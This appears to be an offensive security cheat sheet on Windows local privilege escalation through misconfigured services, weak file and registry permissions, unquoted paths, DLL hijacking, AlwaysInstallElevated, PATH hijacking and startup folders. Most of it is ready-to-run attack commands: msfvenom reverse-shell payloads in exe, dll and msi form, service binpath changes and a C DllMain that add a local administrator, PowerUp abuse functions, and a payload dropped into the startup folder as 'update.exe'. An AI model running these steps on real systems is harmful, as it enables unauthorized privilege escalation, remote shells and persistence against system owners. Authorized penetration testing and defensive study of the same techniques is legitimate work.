Service & Registry Exploits
Abusing misconfigured services, weak file permissions, unquoted paths, registry misconfigurations, and DLL hijacking to escalate privileges.
Sections Service & Registry Exploits
Unquoted Service Paths
If a service binary path contains spaces and isn’t quoted, Windows tries to resolve it by checking each space-delimited segment. Place a malicious binary in the path.
Detection
Find services with unquoted paths.
PS C:\> Get-WmiObject win32_service | Where-Object { $_.PathName -notlike '"*' -and $_.PathName -like '* *' } | Select-Object Name, PathName, StartNamePS C:\> wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\" | findstr /i /v """Via PowerUp.
PS C:\> . .\PowerUp.ps1
PS C:\> Get-UnquotedServiceExploitation
Example: if the path is C:\Program Files\My App\service.exe, Windows checks in this order:
PS C:\> C:\Program.exe
PS C:\> C:\Program Files\My.exe
PS C:\> C:\Program Files\My App\service.exeIf you can write to C:\Program Files\My.exe:
PS C:\> msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o My.exeCopy payload to the writable location, then restart the service.
PS C:\> copy My.exe "C:\Program Files\My.exe"
PS C:\> sc stop <SERVICE_NAME>
PS C:\> sc start <SERVICE_NAME>icacls. You only need write access to one of the intermediate directories.Writable Service Binary
If the current user can overwrite the binary that a service executes, replace it with a payload.
Detection
Check permissions on service binaries.
Get-WmiObject win32_service | Where-Object {$_.State -eq 'Running'} | ForEach-Object {
$path = ($_.PathName -replace '"','').Trim().Split(' ')[0]
$acl = icacls $path 2>$null
if ($acl -match '(M|F|W)') { Write-Host "[VULN] $($_.Name) - $path"; $acl }
}Via PowerUp.
PS C:\> . .\PowerUp.ps1
PS C:\> Get-ModifiableServiceFileExploitation
Backup the original binary, replace with payload, restart service.
PS C:\> copy "C:\Path\To\service.exe" "C:\Path\To\service.exe.bak"
PS C:\> copy payload.exe "C:\Path\To\service.exe"
PS C:\> sc stop <SERVICE_NAME>
PS C:\> sc start <SERVICE_NAME>After getting a shell, restore the original.
PS C:\> copy "C:\Path\To\service.exe.bak" "C:\Path\To\service.exe"
PS C:\> sc start <SERVICE_NAME>Weak Service Permissions (Service Config Modification)
If you can modify a service’s configuration (change the binary path), point it to your payload.
Detection
Check if current user can modify a service.
PS C:\> sc qc <SERVICE_NAME>
PS C:\> sc sdshow <SERVICE_NAME>Via accesschk (SysInternals).
PS C:\> accesschk.exe /accepteula -uwcqv <USER> *Via PowerUp.
PS C:\> . .\PowerUp.ps1
PS C:\> Get-ModifiableServiceExploitation
Change the service binary path to your command.
PS C:\> sc config <SERVICE_NAME> binpath= "C:\Temp\payload.exe"
PS C:\> sc stop <SERVICE_NAME>
PS C:\> sc start <SERVICE_NAME>Or add your user to local admins via the service.
PS C:\> sc config <SERVICE_NAME> binpath= "cmd /c net localgroup Administrators <USER> /add"
PS C:\> sc stop <SERVICE_NAME>
PS C:\> sc start <SERVICE_NAME>Via PowerUp (automated).
PS C:\> . .\PowerUp.ps1
PS C:\> Invoke-ServiceAbuse -Name '<SERVICE_NAME>'Invoke-ServiceAbuse automatically adds a local admin user. Use -UserName and -Password flags to specify your own.DLL Hijacking
If a service or application loads a DLL from a writable directory, or if a DLL is missing from the expected path, place a malicious DLL there.
Detection
Find services with writable directories in their path.
Get-WmiObject win32_service | ForEach-Object {
$dir = Split-Path ($_.PathName -replace '"','').Trim().Split(' ')[0]
$acl = icacls $dir 2>$null
if ($acl -match '(M|F|W)') { Write-Host "[VULN] $($_.Name) - $dir"; $acl }
}Use Process Monitor (procmon) to find missing DLLs (filter for NAME NOT FOUND on .dll files).
C:\Program Files with weak ACLs, and any PATH directories that are writable.Exploitation
Generate a malicious DLL.
PS C:\> msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o hijacked.dllPlace it in the writable directory with the expected filename, then restart the service.
PS C:\> copy hijacked.dll "C:\Path\To\Writable\Dir\expected.dll"
PS C:\> sc stop <SERVICE_NAME>
PS C:\> sc start <SERVICE_NAME>DLL Proxying
For DLLs that are already loaded (not missing), create a proxy DLL that forwards legitimate calls to the original while executing your payload.
// Compile with: x86_64-w64-mingw32-gcc -shared -o hijacked.dll proxy.c
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
system("cmd /c net localgroup Administrators <USER> /add");
}
return TRUE;
}SharpDLLProxy to automate the forwarding.Registry Exploits
AlwaysInstallElevated
If both HKLM and HKCU keys are set to 1, any user can install MSI packages with SYSTEM privileges.
Detection.
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
PS C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedExploitation (both must return 0x1).
# Generate MSI payload
PS C:\> msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o evil.msiPS C:\> msiexec /quiet /qn /i evil.msiAutoRun Programs
If a program is configured to auto-run and its binary is writable.
Detection.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
PS C:\> reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceCheck write permissions on the referenced binaries.
# For each binary found in the registry keys above
PS C:\> icacls "C:\Path\To\autorun.exe"Exploitation: replace the binary, then wait for the next logon (or reboot).
Registry Service Permissions
If you can modify the registry key for a service, change its ImagePath.
Detection.
PS C:\> Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services<SERVICE_NAME>" | Format-ListBroader search for writable service registry keys.
PS C:\> accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\ServicesExploitation.
PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services<SERVICE_NAME>" -Name ImagePath -Value "C:\Temp\payload.exe"PS C:\> sc stop <SERVICE_NAME>
PS C:\> sc start <SERVICE_NAME>PATH Hijacking
If a writable directory appears in the system PATH before the legitimate binary’s directory, you can place a malicious binary with the same name.
Detection
Check the PATH for writable directories.
$env:Path -split ';' | ForEach-Object {
$acl = icacls $_ 2>$null
if ($acl -match '(M|F|W)') { Write-Host "[WRITABLE] $_" }
}Exploitation
Identify a binary that a service or scheduled task calls without a full path, then place your payload in the writable PATH directory with the same name.
PS C:\> copy payload.exe "C:\Writable\Path\Dir\target_binary.exe"Startup Applications
Detection
Check startup folders for writable locations.
PS C:\> icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
PS C:\> icacls "C:\Users<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Exploitation
If the all-users startup folder is writable, drop a payload there. It executes on next logon.
PS C:\> copy payload.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"